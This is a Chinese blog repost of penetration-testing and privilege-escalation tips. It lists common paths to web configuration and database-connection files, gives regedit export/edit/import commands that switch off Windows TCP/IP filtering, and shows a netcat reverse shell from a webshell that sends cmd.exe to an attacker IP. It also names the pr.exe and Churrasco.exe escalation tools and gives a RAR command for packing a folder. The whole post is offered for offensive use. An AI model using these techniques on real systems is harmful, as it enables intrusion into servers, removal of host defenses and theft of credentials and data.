天天看点
返回

提权、渗透、经验、技巧总结大全四

各种网站的配置文件相对路径大全:

/config.php

<a href="http://www.cnblogs.com/config.php" target="_blank">http://www.cnblogs.com/config.php</a>

../config.php

<a href="http://www.cnblogs.com/config.php" target="_blank">http://www.cnblogs.com/../config.php</a>

/config.inc.php

./config.inc.php

<a href="http://www.cnblogs.com/config.inc.php" target="_blank">http://www.cnblogs.com/config.inc.php</a>

../config.inc.php

<a href="http://www.cnblogs.com/config.inc.php" target="_blank">http://www.cnblogs.com/../config.inc.php</a>

/conn.php

./conn.php

<a href="http://www.cnblogs.com/conn.php" target="_blank">http://www.cnblogs.com/conn.php</a>

../conn.php

<a href="http://www.cnblogs.com/conn.php" target="_blank">http://www.cnblogs.com/../conn.php</a>

/conn.asp

./conn.asp

<a href="http://www.cnblogs.com/conn.asp" target="_blank">http://www.cnblogs.com/conn.asp</a>

../conn.asp

<a href="http://www.cnblogs.com/conn.asp" target="_blank">http://www.cnblogs.com/../conn.asp</a>

/config/config.php

<a href="http://www.cnblogs.com/config/config.php" target="_blank">http://www.cnblogs.com/config/config.php</a>

../config/config.php

<a href="http://www.cnblogs.com/config/config.php" target="_blank">http://www.cnblogs.com/../config/config.php</a>

/config/config.inc.php

./config/config.inc.php

<a href="http://www.cnblogs.com/config/config.inc.php" target="_blank">http://www.cnblogs.com/config/config.inc.php</a>

../config/config.inc.php

<a href="http://www.cnblogs.com/config/config.inc.php" target="_blank">http://www.cnblogs.com/../config/config.inc.php</a>

/config/conn.php

./config/conn.php

<a href="http://www.cnblogs.com/config/conn.php" target="_blank">http://www.cnblogs.com/config/conn.php</a>

../config/conn.php

<a href="http://www.cnblogs.com/config/conn.php" target="_blank">http://www.cnblogs.com/../config/conn.php</a>

/config/conn.asp

./config/conn.asp

<a href="http://www.cnblogs.com/config/conn.asp" target="_blank">http://www.cnblogs.com/config/conn.asp</a>

../config/conn.asp

<a href="http://www.cnblogs.com/config/conn.asp" target="_blank">http://www.cnblogs.com/../config/conn.asp</a>

/data/config.php

<a href="http://www.cnblogs.com/data/config.php" target="_blank">http://www.cnblogs.com/data/config.php</a>

../data/config.php

<a href="http://www.cnblogs.com/data/config.php" target="_blank">http://www.cnblogs.com/../data/config.php</a>

/data/config.inc.php

./data/config.inc.php

<a href="http://www.cnblogs.com/data/config.inc.php" target="_blank">http://www.cnblogs.com/data/config.inc.php</a>

../data/config.inc.php

<a href="http://www.cnblogs.com/data/config.inc.php" target="_blank">http://www.cnblogs.com/../data/config.inc.php</a>

/data/conn.php

./data/conn.php

<a href="http://www.cnblogs.com/data/conn.php" target="_blank">http://www.cnblogs.com/data/conn.php</a>

../data/conn.php

<a href="http://www.cnblogs.com/data/conn.php" target="_blank">http://www.cnblogs.com/../data/conn.php</a>

/data/conn.asp

./data/conn.asp

<a href="http://www.cnblogs.com/data/conn.asp" target="_blank">http://www.cnblogs.com/data/conn.asp</a>

../data/conn.asp

<a href="http://www.cnblogs.com/data/conn.asp" target="_blank">http://www.cnblogs.com/../data/conn.asp</a>

/include/config.php

<a href="http://www.cnblogs.com/include/config.php" target="_blank">http://www.cnblogs.com/include/config.php</a>

../include/config.php

<a href="http://www.cnblogs.com/include/config.php" target="_blank">http://www.cnblogs.com/../include/config.php</a>

/include/config.inc.php

./include/config.inc.php

<a href="http://www.cnblogs.com/include/config.inc.php" target="_blank">http://www.cnblogs.com/include/config.inc.php</a>

../include/config.inc.php

<a href="http://www.cnblogs.com/include/config.inc.php" target="_blank">http://www.cnblogs.com/../include/config.inc.php</a>

/include/conn.php

./include/conn.php

<a href="http://www.cnblogs.com/include/conn.php" target="_blank">http://www.cnblogs.com/include/conn.php</a>

../include/conn.php

<a href="http://www.cnblogs.com/include/conn.php" target="_blank">http://www.cnblogs.com/../include/conn.php</a>

/include/conn.asp

./include/conn.asp

<a href="http://www.cnblogs.com/include/conn.asp" target="_blank">http://www.cnblogs.com/include/conn.asp</a>

../include/conn.asp

<a href="http://www.cnblogs.com/include/conn.asp" target="_blank">http://www.cnblogs.com/../include/conn.asp</a>

/inc/config.php

<a href="http://www.cnblogs.com/inc/config.php" target="_blank">http://www.cnblogs.com/inc/config.php</a>

../inc/config.php

<a href="http://www.cnblogs.com/inc/config.php" target="_blank">http://www.cnblogs.com/../inc/config.php</a>

/inc/config.inc.php

./inc/config.inc.php

<a href="http://www.cnblogs.com/inc/config.inc.php" target="_blank">http://www.cnblogs.com/inc/config.inc.php</a>

../inc/config.inc.php

<a href="http://www.cnblogs.com/inc/config.inc.php" target="_blank">http://www.cnblogs.com/../inc/config.inc.php</a>

/inc/conn.php

./inc/conn.php

<a href="http://www.cnblogs.com/inc/conn.php" target="_blank">http://www.cnblogs.com/inc/conn.php</a>

../inc/conn.php

<a href="http://www.cnblogs.com/inc/conn.php" target="_blank">http://www.cnblogs.com/../inc/conn.php</a>

/inc/conn.asp

./inc/conn.asp

<a href="http://www.cnblogs.com/inc/conn.asp" target="_blank">http://www.cnblogs.com/inc/conn.asp</a>

../inc/conn.asp

<a href="http://www.cnblogs.com/inc/conn.asp" target="_blank">http://www.cnblogs.com/../inc/conn.asp</a>

/index.php

./index.php

<a href="http://www.cnblogs.com/index.php" target="_blank">http://www.cnblogs.com/index.php</a>

../index.php

<a href="http://www.cnblogs.com/index.php" target="_blank">http://www.cnblogs.com/../index.php</a>

/index.asp

./index.asp

<a href="http://www.cnblogs.com/index.asp" target="_blank">http://www.cnblogs.com/index.asp</a>

../index.asp

<a href="http://www.cnblogs.com/index.asp" target="_blank">http://www.cnblogs.com/../index.asp</a>

去除TCP IP筛选:

TCP/IP筛选在注册表里有三处,分别是:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip 

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用以下命令来导出注册表项:

regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip 

regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip 

regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

然后再把三个文件里的:

“EnableSecurityFilters"=dword:00000001”

改为:

“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可:

regedit -s D:\a.reg 

regedit -s D:\b.reg 

regedit -s D:\c.reg 

Webshell 提权小技巧:

Cmd路径:c:\windows\temp\cmd.exe

Nc 也在同目录下,例如反弹cmdshell:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

通常都不会成功。

而直接在 cmd 路径上输入:c:\windows\temp\nc.exe

命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。这个不是重点

我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

命令行调用 RAR 打包:

rar a -k -r -s -m3 c:\1.rar c:\folder

 本文转自gaodi2002 51CTO博客,原文链接:http://blog.51cto.com/gaodi2002/1618133

php 索引 Windows windows索引 windows文件pdf windows启用日志 windows hosts文件 windows不能启动
上一篇: 使用dd命令进行远程备份
下一篇: vmware esxi4 u1开启ssh功能

继续阅读